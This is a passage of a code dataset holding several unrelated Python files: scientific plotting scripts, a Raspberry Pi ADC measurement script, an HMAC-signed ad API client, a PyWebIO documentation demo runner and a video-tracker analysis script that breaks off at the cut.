np.asarray(dict_data_per_component[name_component],\n dtype=np.float)\n except:\n dict_data_per_component = {name_data: np.asarray([]).reshape(0,len(dict_data_per_component[name_component][0])) for name_data in list_names_components}\n return dict_data_per_component\n\n\ndef project_axes(array: np.array, index_axes: Union[int, np.array]) -> np.array:\n if isinstance(index_axes, int):\n return array[:, index_axes]\n elif isinstance(index_axes, np.ndarray):\n return array.T[index_axes].T\n\n\ndef pca():\n # TODO\n pass\n\n\ndef save_figure(figure,\n name_without_format: str,\n list_formats: List[str]\n ) -> None:\n for _format in list_formats:\n figure.savefig(f\"{name_without_format}.{_format}\", format=_format)\n\n\ndef get_colors_array(option_color: OptionsColor,\n ground_truth_component: np.ndarray,\n indexes=None,\n ) -> np.ndarray:\n if not indexes:\n indexes = [0, 1, 2]\n if option_color == OptionsColor.COLORMAP:\n if ground_truth_component.shape[1] == 2:\n return AIRL_ColorMap.get_2D_colormap(ground_truth_component)\n elif ground_truth_component.shape[1] > 2:\n return AIRL_ColorMap.get_2D_colormap(ground_truth_component[:, np.array([indexes[0], indexes[1]])])\n elif option_color == OptionsColor.RGB:\n if ground_truth_component.shape[1] == 3:\n return convert_to_rgb(ground_truth_component)\n elif ground_truth_component.shape[1] > 3:\n return convert_to_rgb(ground_truth_component[:, np.array(indexes)])\n else:\n raise ValueError(\"option_color is supposed to be an instance of OptionsColor\")\n\n\ndef _create_joint_plot(name_saved_plot: str,\n data_frame,\n list_formats: List[str],\n show_plot: bool = False,\n do_put_title: bool = False\n ):\n sns.set(style=\"white\")\n\n hexplot = sns.jointplot(\"x\", \"y\", data=data_frame, kind=\"hex\", joint_kws={})\n plt.subplots_adjust(right=0.8, left=0.2, top=0.8, bottom=0.2) # shrink fig so cbar is visible\n # make new ax object for the cbar\n cbar_ax = hexplot.fig.add_axes([0.85, .25, .05, .4]) # x, y, width, height\n plt.colorbar(cax=cbar_ax)\n\n figure = hexplot.fig\n\n if show_plot:\n plt.show()\n\n if do_put_title:\n figure.suptitle(name_saved_plot)\n\n save_figure(figure, name_saved_plot, list_formats) # TODO\n figure.clear()\n plt.cla()\n plt.clf()\n plt.close()\n\n\ndef _create_color_plot(path_saved_plot: str,\n data_frame: pd.DataFrame,\n ground_truth_component: np.ndarray,\n option_color: OptionsColor,\n list_formats: List[str],\n show_plot: bool = False,\n do_put_title: bool = False,\n indexes: tuple = None,\n ):\n if not indexes:\n indexes = (0, 1)\n sns.set(style=\"darkgrid\")\n color = sns.color_palette()[5]\n g = sns.jointplot(\"x\", \"y\", data=data_frame, kind=\"reg\", stat_func=None,\n color='k', height=7, xlim=(-np.pi - 0.1, np.pi + 0.1), ylim=(-np.pi - 0.1, np.pi + 0.1))\n g.ax_joint.cla()\n colors_array = get_colors_array(option_color, ground_truth_component, indexes=indexes)\n if np.max(colors_array) > 2:\n colors_array = colors_array / 255.\n for i, row in enumerate(data_frame.values):\n plt.plot(row[0], row[1], color=colors_array[i], marker='o')\n g.set_axis_labels('x', 'y', fontsize=16)\n if show_plot:\n plt.show()\n\n fig = g.fig\n\n if do_put_title:\n fig.suptitle(path_saved_plot)\n\n save_figure(fig, path_saved_plot, list_formats) # TODO\n fig.clear()\n plt.cla()\n plt.clf()\n plt.close()\n\n\ndef convert_to_rgb(dataset: np.ndarray, indexes_color_component, center=None, numpy_max=None, rank_based_coloring=True, max_l=None):\n assert len(indexes_color_component) in (2, 3)\n\n if len(indexes_color_component) == 2:\n rgb_color_component = AIRL_ColorMap.get_2D_colormap(dataset[:, np.array(list(indexes_color_component))], center=center, numpy_max=numpy_max, rank_based_coloring=rank_based_coloring, max_l=max_l)\n elif len(indexes_color_component) == 3:\n sub_component = dataset[:, np.array(list(indexes_color_component))]\n\n rgb_max = np.max(sub_component, axis=0)\n rgb_min = np.min(sub_component, axis=0)\n rgb_color_component = np.asarray(255 * (sub_component - rgb_min) / (rgb_max - rgb_min), dtype=np.int)\n else:\n raise ValueError\n\n list_str_colors = [\n f'rgb({rgb_color_component[i, 0]}, '\n f'{rgb_color_component[i, 1]}, '\n f'{rgb_color_component[i, 2]})' for i\n in range(rgb_color_component.shape[0])]\n\n return rgb_color_component, list_str_colors\n\n\ndef create_html_plot(path_saved_plot,\n plot_component: np.ndarray,\n color_component: np.ndarray,\n indexes_plot_component: tuple,\n indexes_color_component: tuple,\n compare_component:np.ndarray=None,\n latent_component:np.ndarray=None,\n compare_latent_component: np.ndarray=None,\n star=False,\n added_metric_component=None\n ):\n assert len(indexes_plot_component) in (2, 3)\n assert len(indexes_color_component) in (2, 3)\n\n rgb_color_component, list_str_colors = convert_to_rgb(color_component, indexes_color_component)\n\n if added_metric_component is None:\n dict_marker = dict(\n size=7,\n color=list_str_colors, # set color to an array/list of desired values\n opacity=1\n )\n else:\n dict_marker = dict(\n size=7,\n color=added_metric_component, # set color to an array/list of desired values\n opacity=1,\n colorscale='Viridis',\n colorbar=dict(thickness=20),\n cmin=0,\n cmax=400\n )\n\n if len(indexes_plot_component) == 3:\n fig = go.Figure(data=[go.Scatter3d(\n x=plot_component[:, indexes_plot_component[0]],\n y=plot_component[:, indexes_plot_component[1]],\n z=plot_component[:, indexes_plot_component[2]],\n text=[f'index: {index}' for index in np.arange(np.size(plot_component, axis=0))],\n mode='markers',\n marker=dict_marker\n )])\n elif len(indexes_plot_component) == 2:\n fig = go.Figure(data=[go.Scatter(\n x=plot_component[:, indexes_plot_component[0]],\n y=plot_component[:, indexes_plot_component[1]],\n text=[f'index: {index}' for index in np.arange(np.size(plot_component, axis=0))],\n mode='markers',\n marker=dict_marker\n )])\n else:\n raise ValueError\n if latent_component is not None:\n d = {}\n d_compare = {}\n X,Y,Z,color = [], [], [], []\n for i in range(np.size(latent_component, axis=0)):\n index_closer = np.argmin(np.linalg.norm(compare_latent_component - latent_component[i, :], axis=1), axis=0).item()\n # compare_point = compare_component[index_closer, :]\n # component_point = plot_component[index_closer, :]\n if index_closer not in d:\n d[index_closer] = [plot_component[i, :]]\n else:\n d[index_closer].append(plot_component[i, :])\n d_compare[index_closer] = compare_component[index_closer, :]\n # fig.add_shape(\n # # Line Diagonal\n # type=\"line\",\n # x0=compare_point[0],\n # y0=compare_point[1],\n # x1=component_point[0],\n # y1=component_point[1],\n # line=dict(\n # color=list_str_colors[index_closer],\n # width=4,\n # dash=\"dashdot\",\n # )\n # )\n for index_closer, list_neighbours in d.items():\n if len(list_neighbours) >= 20:\n for neighbour in list_neighbours:\n X.append(neighbour[indexes_plot_component[0]])\n Y.append(neighbour[indexes_plot_component[1]])\n Z.append(neighbour[indexes_plot_component[2]])\n color.append(str(index_closer))\n if star:\n X.append(d_compare[index_closer][indexes_plot_component[0]])\n Y.append(d_compare[index_closer][indexes_plot_component[1]])\n Z.append(d_compare[index_closer][indexes_plot_component[2]])\n color.append(str(index_closer))\n df = pd.DataFrame(dict(X=X, Y=Y, Z=Z, color=color))\n import plotly.express as px\n fig = px.line_3d(df, x='X', y='Y', z='Z', color=\"color\")\n # fig.update_shapes(dict(xref='x', yref='y'))\n try:\n print(f\"Saving new figure there: {path_saved_plot}.html\")\n fig.write_html(f\"{path_saved_plot}.html\")\n print(\"Saving Succeeded\")\n except:\n print(f\"Saving of {path_saved_plot} failed, maybe the file already exists\")\n\n\ndef get_data_proj(file_path_projected_archive: str) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n try:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH,\n Components.VALUE_FITNESS,\n Components.VALUE_FITNESS_IMPLICIT,\n Components.NOVELTY,\n ])\n implicit_fitness_component = dict_data_per_component[Components.VALUE_FITNESS_IMPLICIT] # TODO\n novelty_component = dict_data_per_component[Components.NOVELTY]\n\n except:\n try:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH,\n Components.VALUE_FITNESS,\n Components.NOVELTY,\n ])\n novelty_component = dict_data_per_component[Components.NOVELTY]\n\n implicit_fitness_component = np.zeros_like(novelty_component)\n except:\n try:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH,\n Components.VALUE_FITNESS,\n ])\n value_fitness_component = dict_data_per_component[Components.VALUE_FITNESS]\n\n implicit_fitness_component = np.zeros_like(value_fitness_component)\n novelty_component = np.zeros_like(value_fitness_component)\n except:\n # print(\"[ERROR] PROBLEM IN PROJ FILE: \", file_path_projected_archive)\n raise\n\n latent_component = dict_data_per_component[Components.LATENT_COMPONENT]\n ground_truth_component = dict_data_per_component[Components.GROUND_TRUTH]\n value_fitness_component = dict_data_per_component[Components.VALUE_FITNESS]\n\n return latent_component, \\\n ground_truth_component, \\\n implicit_fitness_component, \\\n novelty_component\n\n\n\ndef get_data_offspring(file_path_projected_archive: str) -> Tuple[np.ndarray, np.ndarray]:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"_1\",\n \"_2\",\n Components.LATENT_COMPONENT,\n Components.GROUND_TRUTH])\n latent_component = dict_data_per_component[Components.LATENT_COMPONENT]\n ground_truth_component = dict_data_per_component[Components.GROUND_TRUTH]\n return latent_component, \\\n ground_truth_component\n\n\ndef get_data_modifier(file_path_projected_archive: str) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n dict_data_per_component = read_data(file_path_projected_archive,\n [\"1\"])\n gen_component = dict_data_per_component['1'][:, 0]\n l_component = dict_data_per_component['1'][:, 1]\n pop_size_component = dict_data_per_component['1'][:, 2]\n\n gen_component_without_duplicates = gen_component\n l_component_without_duplicates = l_component\n pop_size_component_without_duplicates = pop_size_component\n\n for gen in set(gen_component.flatten()):\n index_gen = np.where(gen_component_without_duplicates == gen)[0]\n if index_gen.size > 1:\n gen_component_without_duplicates = np.delete(gen_component_without_duplicates, index_gen[:-1].astype(int), axis=0)\n l_component_without_duplicates = np.delete(l_component_without_duplicates, index_gen[:-1].astype(int), axis=0)\n pop_size_component_without_duplicates = np.delete(pop_size_component_without_duplicates, index_gen[:-1].astype(int), axis=0)\n\n return gen_component_without_duplicates, l_component_without_duplicates, pop_size_component_without_duplicates\n\n\ndef get_data_frame(component, dim):\n if dim == 2:\n return pd.DataFrame(component, columns=[\"x\", \"y\"])\n elif dim == 3:\n return pd.DataFrame(component, columns=[\"x\", \"y\", \"z\"])\n else:\n return pd.DataFrame(component)\n\n\ndef create_archive_figures(file_path_projected_archive: str,\n path_save: str,\n generation: int,\n list_formats: List[str],\n do_put_title: bool = False,\n show_plots: bool = False,\n exp: str = '',\n ) -> None:\n if exp:\n prefix_exp = f\"{exp}_\"\n else:\n prefix_exp = \"\"\n\n latent_component, ground_truth_component, *_ = get_data_proj(file_path_projected_archive)\n # ground_truth_component = project_axes(ground_truth_component, np.array([0, 1]))\n # ground_truth_component = np.hstack((ground_truth_component, np.random.rand(ground_truth_component.shape[0]).reshape((-1, 1))))\n\n if ground_truth_component.shape[1] == 2:\n df_latent = get_data_frame(latent_component, dim=2)\n df_ground_truth = get_data_frame(ground_truth_component, dim=2)\n\n _create_color_plot(path_saved_plot=os.path.join(path_save, f\"archive_desc_gen_{generation:07}\"),\n data_frame=df_latent,\n latent_component=latent_component,\n ground_truth_component=ground_truth_component,\n option_color=OptionsColor.COLORMAP,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n _create_color_plot(path_saved_plot=os.path.join(path_save, f\"archive_gt_gen_{generation:07}\"),\n data_frame=df_ground_truth,\n latent_component=latent_component,\n ground_truth_component=ground_truth_component,\n option_color=OptionsColor.COLORMAP,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n _create_joint_plot(name_saved_plot=os.path.join(path_save, f\"archive_desc_joint_plot_gen_{generation:07}\"),\n data_frame=df_latent,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n _create_joint_plot(\n name_saved_plot=os.path.join(path_save, f\"archive_ground_truth_joint_plot_gen_{generation:07}\"),\n data_frame=df_ground_truth,\n list_formats=list_formats,\n show_plot=show_plots,\n do_put_title=do_put_title)\n\n elif ground_truth_component.shape[1] >= 3:\n print(latent_component)\n # reducer = umap.UMAP(n_components=3)\n # embedding = reducer.fit_transform(latent_component)\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_rot_gen_{generation:07}\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(3, 4, 5),\n indexes_color_component=(0, 1, 2),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_rot_gen_{generation:07}_comp\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(0, 1, 2),\n indexes_color_component=(0, 1, 2),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_pos_gen_{generation:07}\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(0, 1, 2),\n indexes_color_component=(3, 4, 5),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_pos_gen_{generation:07}_comp\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(3, 4, 5),\n indexes_color_component=(3, 4, 5),\n )\n\n create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}gt_pos_gen_{generation:07}_test\"),\n plot_component=ground_truth_component,\n color_component=ground_truth_component,\n indexes_plot_component=(3, 4),\n indexes_color_component=(0, 1),\n )\n\n # create_html_plot(path_saved_plot=os.path.join(path_save, f\"{prefix_exp}latent_gen_{generation:07}\"),\n # plot_component=embedding,\n # color_component=ground_truth_component,\n # indexes_plot_component=(0, 1, 2),\n # indexes_color_component=(3, 4),\n # )\n\n\nif __name__ == '__main__':\n # create_archive_figures(\"example/proj_1900.dat\",\n # \"images/\",\n # generation=1900,\n # list_formats=[\"png\"])\n latent_aurora, gt_aurora, *_ = get_data_proj('/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/proj_5000_aurora.dat')\n latent_ns, gt_ns, *_ = get_data_proj('/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/proj_5000_ns.dat')\n create_html_plot(\"/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/plot_rot\",\n plot_component=gt_ns,\n color_component=gt_ns,\n indexes_plot_component=(3, 4, 5),\n indexes_color_component=(3, 4, 5),\n latent_component=latent_ns,\n compare_latent_component=latent_aurora,\n compare_component=gt_aurora,\n )\n\n create_html_plot(\"/Users/looka/git/sferes2/exp/aurora/submodules/figure_generator/example/other/plot_pos\",\n plot_component=gt_ns,\n color_component=gt_ns,\n indexes_plot_component=(0, 1, 2),\n indexes_color_component=(0, 1, 2),\n latent_component=latent_ns,\n compare_latent_component=latent_aurora,\n compare_component=gt_aurora,\n star=True,\n )\n","sub_path":"submodules/figure_generator/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":22361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635549728","text":"import RPi.GPIO as GPIO\nimport time\nimport matplotlib.pyplot as plt\nimport numpy\n\n\nTroikaModulePin = 17\nComparePin = 4\nDAC = (26, 19, 13, 6, 5, 11, 9, 10)\nLEDS = (21, 20, 16, 12, 7, 8, 25, 24)\n\nMAX_VOLTAGE = 3.3 #V\n\ndef num2pins(pins, num):\n for i in range(7, -1, -1):\n GPIO.output(pins[i], num % 2)\n num //= 2\n\ndef adc():\n start = 0; end = 255\n while start <= end:\n mid = (start + end) // 2\n num2pins(DAC, mid)\n time.sleep(0.0003)\n if GPIO.input(ComparePin) == 0:\n end = mid - 1\n else:\n start = mid + 1\n \n if end < 0:\n print(start)\n return start\n else:\n print(end)\n return end\n\ndef analog(digital_voltage):\n return MAX_VOLTAGE * digital_voltage / 255\n\n\ntry:\n\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(TroikaModulePin, GPIO.OUT)\n GPIO.setup(ComparePin, GPIO.IN)\n GPIO.setup(DAC, GPIO.OUT)\n GPIO.setup(LEDS, GPIO.OUT)\n\n measurements = [] # [ (time0, volt0), (time1, volt1), ...]\n voltage = 0\n raw = []\n\n GPIO.output(TroikaModulePin, 0)\n time.sleep(0.1)\n\n START_TIME = time.time()\n GPIO.output(TroikaModulePin, 1)\n\n while voltage < 250:\n voltage = adc()\n raw.append(voltage)\n measurements.append((time.time() - START_TIME, analog(voltage)))\n time.sleep(0.002)\n\n GPIO.output(TroikaModulePin, 0)\n while voltage > 3:\n voltage = adc()\n raw.append(voltage)\n measurements.append((time.time() - START_TIME, analog(voltage)))\n time.sleep(0.002)\n\n numpy.savetxt('data.txt', raw, fmt='%d')\n\n dT = 0\n for i in range(1, len(measurements)):\n dT += measurements[i][0] - measurements[i-1][0]\n dT /= len(measurements) - 1\n dV = MAX_VOLTAGE / 255\n\n with open(\"settings.txt\", \"w\") as settings:\n settings.write(str(dT)+\"\\n\"+str(dV))\n\n plt.plot([measure[0] for measure in measurements], \n [measure[1] for measure in measurements])\n\n plt.title('U(t)')\n plt.xlabel('Время, с')\n plt.ylabel('Напряжение, В')\n plt.show()\n\n\nfinally:\n\n GPIO.cleanup()\n\n\n\n\n","sub_path":"ADC/caraciptor.py","file_name":"caraciptor.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145702650","text":"import hashlib\nimport hmac\nimport urllib2\n\ntry:\n import json\nexcept:\n import simplejson as json\n\nfrom models import *\n\nTLDR_ENDPOINT = \"http://a.thoughtleadr.com/v2/\"\n\nclass ThoughtLeadrClient(object):\n\n def __init__(self, public_key, private_key):\n self.site = public_key\n self.pk = private_key\n self.endpoint = \"%s%s\" % (TLDR_ENDPOINT, self.site)\n\n def get_ad(self, ad_id, debug=False):\n ad = None\n #try:\n result = self.fetch(\"ad/%s?debug=%s\" % (ad_id, self.py_bool_2_js(debug)))\n ad = Ad(result)\n #except Exception, e:\n # print e\n return ad\n\n def py_bool_2_js(self, answer):\n if answer:\n return \"true\"\n return \"false\"\n\n def fetch(self, url):\n req = self.make_request(url)\n opener = urllib2.build_opener()\n f = opener.open(req)\n json_data = json.load(f)\n return json_data\n\n def make_request(self, url):\n full_url = \"%s/%s\" % (self.endpoint, url)\n req = urllib2.Request(full_url)\n signature = self.auth(\"/v2/%s/%s\" % (self.site, url))\n req.add_header(\"Authorization\", signature)\n return req\n\n def auth(self, msg):\n dig = hmac.new(self.pk, msg=msg, digestmod=hashlib.sha256).hexdigest()\n return dig\n\n\n","sub_path":"tldr/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"176767827","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn-white')\n\ndata = np.random.randn(1000)\n# plt.hist(data)\n# plt.show()\n\n\n# plt.hist(data, bins=30, normed=True, alpha=0.5,\n# histtype='stepfilled', color='steelblue',\n# edgecolor='none')\n\n# plt.show()\n\nx1 = np.random.normal(0, 0.8, 1000)\nx2 = np.random.normal(-2, 1, 1000)\nx3 = np.random.normal(3, 2, 1000)\n\nkwargs = dict(histtype='stepfilled', alpha=0.3, normed=True, bins=40)\n\nplt.hist(x1, hatch='/', **kwargs)\nplt.hist(x2, **kwargs)\nplt.hist(x3, **kwargs)\nplt.show()","sub_path":"plotlib/hist/hist_stepfilled.py","file_name":"hist_stepfilled.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476142784","text":"import matplotlib.lines as mlines\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom visualize.helpers.data import filter_data, get_values, sort_data, load_pickles, load_pickle\nfrom visualize.helpers.plot import interpolate_plot, markers, save_file, set_plot\nfrom visualize.helpers.colors import color2\nfrom analyze.defines import REACTOR_GLASS_SHORT_QUAD\n\ndef plot_inv_ppm(data_nor, data_inv):\n \"\"\"\n Plot ppm to inverted reactor\n\n :param data: NOT USED\n :param reactor: long or short glass reactor\n :return:\n \"\"\"\n fig, (ax_ppm, ax_yield) = plt.subplots(2, 1, sharex=True)\n for i, d in enumerate([data_nor, data_inv]):\n m = markers[i]\n c=color2[i]\n x = get_values(d, key='input_f')\n ux = sorted(np.unique(x))\n y = get_values(d, 'o3_ppm')\n y2 = get_values(d, 'output_yield_gkwh')\n z2 = get_values(d, 'output_yield_gkwh_single')\n uz2 = [] # combined version of z2\n uy2 = []\n uy = []\n for uxa in ux:\n ind = [True if a==uxa else False for a in x ]\n d = z2[ind] # list of lists of all single data points for 'uxa'\n uz2a = ([item for sublist in d for item in sublist]) # flattened version of d, list of all single data.\n uy2a = np.mean(uz2a)\n uya = np.mean(y[ind])\n # average should be equal to average of averages:\n print(uy2/np.mean(y2[ind]))\n uy2.append(uy2a)\n uz2.append(uz2a)\n uy.append(uya)\n\n interpolate_plot(ax_yield, ux, uy2)\n interpolate_plot(ax_ppm, ux, uy)\n for xa, ya, y2a in zip(ux, uy, uy2):\n ax_ppm.scatter(xa, ya, c=c, marker=m)\n ax_yield.scatter(xa, y2a, c=c, marker=m)\n\n # mi = [y2a - min(z2a) for z2a, y2a in zip(uz2, uy2)]\n # ma = [max(z2a) - y2a for z2a, y2a in zip(uz2, uy2)]\n std = []\n for z2a in uz2:\n std.append(np.std(z2a))\n # std = np.std(z2, 1) # list of minima of y\n ax_yield.errorbar(ux, uy2, yerr=std, xerr=None, ecolor=c, fmt='none', capsize=3)\n\n marker_legends = [\n (mlines.Line2D([], [], marker=markers[0], label='Normal', color='grey', markerfacecolor=color2[0], markeredgewidth=0)),\n (mlines.Line2D([], [], marker=markers[1], label='Inverted', color='grey', markerfacecolor=color2[1], markeredgewidth=0)),\n ]\n\n ax_ppm.set_ylabel('Ozone [ppm]')\n ax_yield.set_ylabel('Yield [g/kWh]')\n ax_yield.set_xlabel('Frequency [Hz]')\n plt.legend(handles=marker_legends)\n set_plot(fig, plot_height=1.9)\n save_file(fig, name='inv-ppm', path='plots_final_v2/normal')\n\n\nif __name__ == '__main__':\n datas = load_pickle('20180115-def1/run5')\n datas += load_pickle('20180118-def2/run1')\n datas += load_pickle('20180119-def3/run1')\n datas += load_pickle('20180115-def1/run2')\n datas += load_pickle('20180118-def2/run3')\n datas += load_pickle('20180118-def2/run3-2')\n datas += load_pickle('20180115-def1/run1')\n datas += load_pickle('20180118-def2/run2')\n data_nor = filter_data(datas, reactor=REACTOR_GLASS_SHORT_QUAD, inductance=0)\n data_inv = load_pickle('20180201-inv/run1')\n plot_inv_ppm(data_nor, data_inv)\n plt.show()\n","sub_path":"visualize/final_v2/normal/plot_inv_ppm.py","file_name":"plot_inv_ppm.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"141825859","text":"\"\"\"\n文档中示例代码在线运行\n^^^^^^^^^^^^^^^^\n\"\"\"\nfrom pywebio import start_server\nfrom pywebio.input import *\nfrom pywebio.output import *\nfrom pywebio.session import *\nfrom os import path, listdir\nfrom functools import partial\n\nhere_dir = path.dirname(path.abspath(__file__))\n\n\ndef gen_snippets(code):\n code = code.replace('# ..demo-only', '')\n code = '\\n'.join(i for i in code.splitlines() if '# ..doc-only' not in i)\n\n parts = code.split('\\n## ----\\n')\n for p in parts:\n yield p.strip('\\n')\n\n\ndef run_code(code, scope, locals):\n with use_scope(scope):\n try:\n exec(code, globals(), locals)\n except Exception as e:\n toast('代码产生异常:\"%s:%s\"' % (type(e).__name__, e), color='error')\n\n\nIMPORT_CODE = \"\"\"from pywebio.input import *\nfrom pywebio.output import *\nfrom pywebio.session import *\n\n\"\"\"\n\n\ndef copytoclipboard(code):\n run_js(\"writeText(text)\", text=code)\n toast('已复制')\n\n\ndef handle_code(code, title):\n run_js(\"\"\"\n window.writeText = function(text) {\n const input = document.createElement('INPUT');\n input.style.opacity = 0;\n input.style.position = 'absolute';\n input.style.left = '-100000px';\n document.body.appendChild(input);\n\n input.value = text;\n input.select();\n input.setSelectionRange(0, text.length);\n document.execCommand('copy');\n document.body.removeChild(input);\n return true;\n }\n \"\"\")\n locals = {}\n if title:\n put_markdown('## %s' % title)\n\n for p in gen_snippets(code):\n with use_scope() as scope:\n put_code(p, 'python')\n\n put_buttons(['运行', '复制代码'], onclick=[\n partial(run_code, code=p, scope=scope, locals=locals),\n partial(copytoclipboard, code=IMPORT_CODE + p)\n ])\n\n put_markdown('----')\n\n hold()\n\n\ndef get_app():\n app = {}\n try:\n demos = listdir(path.join(here_dir, 'doc_domes'))\n except Exception:\n demos = []\n\n demo_infos = []\n for name in demos:\n code = open(path.join(here_dir, 'doc_domes', name)).read()\n title, code = code.split('\\n\\n', 1)\n app[name] = partial(handle_code, code=code, title=title)\n demo_infos.append([name, title])\n\n index_html = \"
      \"\n for name, title in demo_infos:\n index_html += '''
    • {name}: {desc}
    • \\n'''.format(\n name=name, desc=title)\n index_html += \"
    \"\n\n def index():\n put_markdown('# PyWebIO Document Code Example Index')\n put_html(index_html)\n\n app['index'] = index\n return app\n\n\nif __name__ == '__main__':\n start_server(get_app(), debug=True, port=8080)\n","sub_path":"demos/doc_demo.py","file_name":"doc_demo.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445425308","text":"# Задача 6. Вариант 10.\r\n# Создайте игру, в которой компьютер загадывает название одной из трех стран, \r\n# входящих в военно-политический блок \"Тройственный союз\", а игрок должен его угадать.\r\n\r\n# Kondrashkina\r\n# 15.09.2016\r\n\r\na = [\"Германия\", \"Австро-Венгрия\", \"Италия\"]\r\na1 = \"Германия\"\r\na2 = \"Австро-Венгрия\"\r\na3 = \"Италия\"\r\nimport random as random_number\r\nb = (random_number.choice(a))\r\nd = input(\"Введите одну из стран Тройственного союза: \")\r\nif (d != a1) and (d != a2) and (d != a3):\r\n\tprint(\"Такая страна не входит в союз.\")\r\nelse:\r\n\tif b == d:\r\n\t\tprint(\"Поздравляю! Ваше мнение совпало с мнением компьютера!\")\r\n\telif (b != d):\r\n\t\tprint(\"К сожалению, Вы не угадали.\")\r\n\r\n\r\n\r\n\r\n\r\ninput (\"\\n\\nНажмите Enter для выхода.\")\r\n\r\n\r\n","sub_path":"ISTp/2013/Kondrashkina_V_P/task_6_10.py","file_name":"task_6_10.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"577517339","text":"import sys\nsys.path.append('/home/jianingq/Tools/analysis/')\nsys.path.append('/home/jianingq/Tools/visualization/')\nsys.path.append('/home/jianingq/Tools/vot_tools/')\n\nfrom visualizer import Visualizer\nfrom vot_utilities import VOT_Utilities\nfrom analyzer import Analyzer\n\nroot = '/home/jianingq/Workspace/vot/SiamRPN'\nfail_gif_export_dir = '/home/jianingq/Tools/analysis/result/gif/fail/'\nfail_image_export_dir = '/home/jianingq/Tools/analysis/result/image/fail/'\nliou_gif_export_dir = '/home/jianingq/Tools/analysis/result/gif/liou/'\nliou_image_export_dir = '/home/jianingq/Tools/analysis/result/image/liou/'\nscale_gif_export_dir = '/home/jianingq/Tools/analysis/result/gif/scale/'\nscale_image_export_dir = '/home/jianingq/Tools/analysis/result/image/scale/'\n\n\ntracker_name = 'SiamRPN'\ntest_case = 'baseline'\nexperiment = 1\n\nanalyze_scale = 2\nanalyze_iou_list = [0.1, 0.2, 0.3, 0.4]\n\nvot = VOT_Utilities(root)\nvideo_names = vot.get_video_names()\n\nfor video_name in video_names[41:]:\n video_length = vot.get_frame_length(video_name)\n gts = vot.get_gts(video_name)\n results = vot.get_results(video_name, tracker_name, test_case, experiment)\n frame_tags = vot.get_frame_tags(video_name)\n video_frames = vot.get_frames(video_name)\n\n analyzer = Analyzer(gts)\n\n ious = analyzer.get_ious(results)\n scale = analyzer.get_large_scale_change(analyze_scale)\n fail = analyzer.get_fail_frames(results)\n\n #Fail Test\n if len(fail) != 0:\n for i in range(len(fail)):\n f = fail[i]\n\n segment_name = video_name + '_fail_' + 'segment{}'.format(i)\n begin = max(0, f - 15)\n end = min(f + 15, video_length)\n segment_frames = video_frames[begin:end]\n segment_gts = gts[begin:end]\n segment_results = results[begin:end]\n segment_tags = frame_tags[begin:end]\n segment_ious = ious[begin:end]\n visualizer = Visualizer()\n visualizer.save_frame(\n fail_image_export_dir,\n segment_name,\n video_frames[f],\n gts[f],\n results[f],\n tag=frame_tags[f],\n iou=ious[f])\n visualizer.generate_gif(\n fail_gif_export_dir,\n segment_name,\n segment_frames,\n segment_gts,\n segment_results,\n tags=segment_tags,\n ious=segment_ious)\n\n #Low IoU Test\n for analyze_iou in analyze_iou_list:\n liou = analyzer.get_low_iou(results, analyze_iou)\n if len(liou) != 0:\n for i in range(len(liou)):\n l = liou[i]\n segment_name = video_name + '_iou_' + str(analyze_iou)+'segment{}'.format(i)\n begin = max(0, l - 15)\n end = min(l + 15, video_length)\n segment_frames = video_frames[begin:end]\n segment_gts = gts[begin:end]\n segment_results = results[begin:end]\n segment_tags = frame_tags[begin:end]\n segment_ious = ious[begin:end]\n visualizer = Visualizer()\n visualizer.save_frame(\n liou_image_export_dir,\n segment_name,\n video_frames[l],\n gts[l],\n results[l],\n tag=frame_tags[l],\n iou=ious[l])\n visualizer.generate_gif(\n liou_gif_export_dir,\n segment_name,\n 